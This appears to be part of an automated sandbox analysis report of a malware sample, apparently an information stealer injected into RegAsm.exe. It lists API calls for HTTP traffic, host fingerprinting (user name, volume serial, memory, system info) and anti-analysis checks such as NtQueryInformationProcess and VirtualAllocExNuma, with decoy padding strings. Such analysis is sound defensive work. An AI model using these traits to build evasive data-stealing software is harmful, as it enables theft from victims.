408673 14205->14206 14207 40869a 14206->14207 14208 40867a codecvt 14206->14208 14227 408d10 14207->14227 14214 408c50 14208->14214 14210 4086a8 codecvt 14213 408698 codecvt 14210->14213 14236 407230 memcpy 14210->14236 14213->14202 14215 408c61 allocator 14214->14215 14217 408c6e allocator 14215->14217 14237 408720 14215->14237 14218 408c92 14217->14218 14219 408cb7 14217->14219 14240 408f80 14218->14240 14220 408d10 allocator 7 API calls 14219->14220 14225 408cc5 codecvt 14220->14225 14222 408ca7 14223 408f80 allocator 6 API calls 14222->14223 14224 408cb5 codecvt 14223->14224 14224->14213 14225->14224 14246 407230 memcpy 14225->14246 14228 408d21 allocator 14227->14228 14229 408d2e 14228->14229 14255 408df0 14228->14255 14230 408d39 14229->14230 14234 408d4e 14229->14234 14258 409050 14230->14258 14233 408d4c codecvt 14233->14210 14234->14233 14235 4082d0 codecvt memcpy 14234->14235 14235->14233 14236->14213 14247 41d320 14237->14247 14241 408f94 14240->14241 14243 408f9c codecvt 14240->14243 14242 408720 allocator 5 API calls 14241->14242 14242->14243 14245 408fe9 codecvt 14243->14245 14254 407250 memmove 14243->14254 14245->14222 14246->14224 14248 41a539 std::exception::exception strlen malloc strcpy_s 14247->14248 14249 41d33a 14248->14249 14250 41d394 __CxxThrowException@8 RaiseException 14249->14250 14251 41d34f 14250->14251 14252 41a5c7 std::exception::exception strlen malloc strcpy_s free 14251->14252 14253 408731 14252->14253 14253->14217 14254->14245 14266 41d2d3 14255->14266 14260 409086 allocator 14258->14260 14273 409220 14260->14273 14261 409180 14262 4082d0 codecvt memcpy 14261->14262 14264 40918f codecvt 14262->14264 14263 4090fe codecvt 14263->14261 14276 407230 memcpy 14263->14276 14264->14233 14267 41a539 std::exception::exception strlen malloc strcpy_s 14266->14267 14268 41d2ed 14267->14268 14269 41d394 __CxxThrowException@8 RaiseException 14268->14269 14270 41d302 14269->14270 14271 41a5c7 std::exception::exception strlen malloc strcpy_s 
free 14270->14271 14272 408e01 14271->14272 14272->14229 14274 409440 allocator 5 API calls 14273->14274 14275 409232 14274->14275 14275->14263 14276->14261 14278 416e4f codecvt allocator 14277->14278 14291 416f00 14278->14291 14280 416621 14280->14178 14280->14179 14282 416e85 14281->14282 14296 416eb0 14282->14296 14286 4095b8 allocator 14285->14286 14287 4082d0 codecvt memcpy 14286->14287 14288 4095cc 14287->14288 14289 408c50 allocator 8 API calls 14288->14289 14290 4095dc 14289->14290 14290->14185 14292 416f5e codecvt 14291->14292 14294 416f14 codecvt 14291->14294 14292->14280 14294->14292 14295 4165e0 memchr 14294->14295 14295->14294 14297 416ec5 allocator 14296->14297 14298 4082d0 codecvt memcpy 14297->14298 14299 416ed9 14298->14299 14300 408c50 allocator 8 API calls 14299->14300 14301 416641 14300->14301 14301->14184 14305 414066 14302->14305 14303 4140b2 ctype 14303->13796 14304 414179 ctype 14304->14303 14307 414c70 7 API calls 14304->14307 14305->14303 14305->14304 14308 413d90 memset memset 14305->14308 14307->14303 14309 413dea 14308->14309 14310 409d30 2 API calls 14309->14310 14313 413f7e ctype 14309->14313 14311 413ea0 ctype 14310->14311 14312 409e60 2 API calls 14311->14312 14311->14313 14312->14313 14313->14305 14317 414412 ctype 14314->14317 14315 414438 14315->13800 14316 4143f0 7 API calls 14316->14317 14317->14315 14317->14316 14318 414c70 7 API calls 14317->14318 14318->14317 14324 407310 14319->14324 14322 407740 14322->13832 14323 40762b 14339 408160 14323->14339 14325 40731d 14324->14325 14326 40732e memset 14325->14326 14338 407380 14326->14338 14327 407580 14364 408120 14327->14364 14330 408160 task memcpy 14331 40759a 14330->14331 14331->14323 14336 4080c0 9 API calls 14336->14338 14337 409270 strcpy_s 14337->14338 14338->14327 14338->14336 14338->14337 14342 4075b0 14338->14342 14347 409290 vsprintf_s 14338->14347 14348 4081a0 14338->14348 14359 4075e0 14338->14359 14340 408560 task memcpy 14339->14340 14341 40816f task 14340->14341 
14341->14322 14368 408070 14342->14368 14345 408070 memcpy 14346 4075cd 14345->14346 14346->14338 14347->14338 14349 4081b2 construct 14348->14349 14350 4081c5 construct 14349->14350 14351 408242 14349->14351 14354 4081f9 14350->14354 14372 4084f0 14350->14372 14352 40825a 14351->14352 14353 4084f0 9 API calls 14351->14353 14383 4092d0 14352->14383 14353->14352 14379 409310 14354->14379 14357 40822e 14357->14338 14360 4080a0 codecvt memcpy 14359->14360 14361 4075f2 14360->14361 14362 4080a0 codecvt memcpy 14361->14362 14363 4075fd 14362->14363 14363->14338 14365 408138 construct allocator 14364->14365 14456 4083c0 14365->14456 14367 40758f 14367->14330 14369 408081 allocator 14368->14369 14370 4082d0 codecvt memcpy 14369->14370 14371 4075c2 14370->14371 14371->14345 14373 408501 14372->14373 14374 408514 14373->14374 14377 40851e 14373->14377 14387 408b70 14374->14387 14376 40851c 14376->14354 14377->14376 14390 408860 14377->14390 14380 40931c construct 14379->14380 14440 4094f0 14380->14440 14384 4092dc construct 14383->14384 14449 4094d0 14384->14449 14388 41d2d3 std::_Xinvalid_argument 5 API calls 14387->14388 14389 408b81 14388->14389 14389->14376 14391 40888d 14390->14391 14392 408892 14391->14392 14394 40889f 14391->14394 14393 408b70 5 API calls 14392->14393 14399 40889a task 14393->14399 14394->14399 14401 408ea0 14394->14401 14398 4088e2 14398->14399 14407 408ae0 14398->14407 14399->14376 14410 4093e0 14401->14410 14404 409330 14424 409600 14404->14424 14432 409360 14407->14432 14411 4088bf 14410->14411 14412 4093fc 14410->14412 14411->14404 14413 409405 ??2@YAPAXI 14412->14413 14414 40941e 14412->14414 14413->14411 14413->14414 14418 407180 14414->14418 14419 41a539 std::exception::exception strlen malloc strcpy_s 14418->14419 14420 407193 14419->14420 14421 41d394 14420->14421 14422 41d3c9 RaiseException 14421->14422 14423 41d3bd 14421->14423 14422->14411 14423->14422 14425 409611 _Copy_impl 14424->14425 14428 409790 14425->14428 14431 4097bf 
14428->14431 14429 40934f 14429->14398 14430 409310 construct 8 API calls 14430->14431 14431->14429 14431->14430 14433 409371 _Copy_impl 14432->14433 14436 409660 14433->14436 14439 409665 14436->14439 14437 408afb 14437->14399 14438 409850 task memcpy 14438->14439 14439->14437 14439->14438 14442 409504 construct allocator 14440->14442 14441 40932c 14441->14357 14442->14441 14444 409540 14442->14444 14445 4095a0 allocator 8 API calls 14444->14445 14446 409563 14445->14446 14447 4095a0 allocator 8 API calls 14446->14447 14448 409575 14447->14448 14448->14441 14452 4096d0 14449->14452 14454 4096e7 construct allocator 14452->14454 14453 4092ec 14453->14357 14454->14453 14455 409540 allocator 8 API calls 14454->14455 14455->14453 14457 4083d6 14456->14457 14462 4083d1 std::error_category::default_error_condition 14456->14462 14458 408457 14457->14458 14459 4083ff 14457->14459 14480 408560 14458->14480 14465 408a90 14459->14465 14462->14367 14463 408407 construct 14463->14462 14469 408740 14463->14469 14466 408aa5 14465->14466 14484 408e10 14466->14484 14470 408752 construct 14469->14470 14471 4087ef 14470->14471 14472 408769 construct 14470->14472 14473 4084f0 9 API calls 14471->14473 14474 408807 construct 14471->14474 14475 4084f0 9 API calls 14472->14475 14476 40879d construct 14472->14476 14473->14474 14477 409310 construct 8 API calls 14474->14477 14475->14476 14479 409310 construct 8 API calls 14476->14479 14478 4087db 14477->14478 14478->14463 14479->14478 14481 40858c task 14480->14481 14482 40856f task 14480->14482 14481->14462 14483 408ae0 task memcpy 14482->14483 14483->14481 14486 408e29 std::error_category::default_error_condition 14484->14486 14485 408acf 14485->14463 14486->14485 14490 4093a0 14486->14490 14489 408ae0 task memcpy 14489->14485 14491 4093b1 _Copy_impl 14490->14491 14494 409690 14491->14494 14496 409695 construct 14494->14496 14495 408e60 14495->14489 14496->14495 14497 409720 _Copy_impl 8 API calls 14496->14497 14497->14496 14499 4189f9 
14498->14499 14500 418a07 malloc 14499->14500 14501 4189ff 14499->14501 14500->14501 14502 418a25 14500->14502 14501->13887 14502->14501 14503 418a6d memset 14502->14503 14503->14501 15111 416593 15113 416551 15111->15113 15112 4155f0 129 API calls 15114 4165b6 15112->15114 15113->15112

            Control-flow Graph

            APIs
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
            • strlen.MSVCRT ref: 00404740
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
            Strings
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
            • API String ID: 2127927946-2218711628

            Control-flow Graph

            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$??2@$ConnectCrackFileHttpOpenReadRequestSend
            • String ID: ERROR$ERROR$GET
            • API String ID: 1522062773-2509457195
            APIs
            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: HttpQueryInfoA$InternetSetOptionA
            • API String ID: 1029625771-1775429166

            Control-flow Graph

            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$Internet$CloseCrackHandle
            • String ID: "$"$------$------$------
            • API String ID: 3842476067-2180234286

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$CrackInternet
            • String ID: <
            • API String ID: 676793843-4251816714

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$ExitProcess
            • String ID: block
            • API String ID: 762877946-2199623458

            Control-flow Graph

            APIs
            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: :$C$\
            • API String ID: 2039140958-3809124531

            Control-flow Graph

            APIs
            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
            • __aulldiv.LIBCMT ref: 00401258
            • __aulldiv.LIBCMT ref: 00401266
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv$GlobalMemoryStatus
            • String ID: @
            • API String ID: 2185283323-2766056989

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194AA
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194DF
            Strings
            • NtQueryInformationProcess, xrefs: 004195BA
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: NtQueryInformationProcess
            • API String ID: 1029625771-2781105232

            Control-flow Graph

            APIs
              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
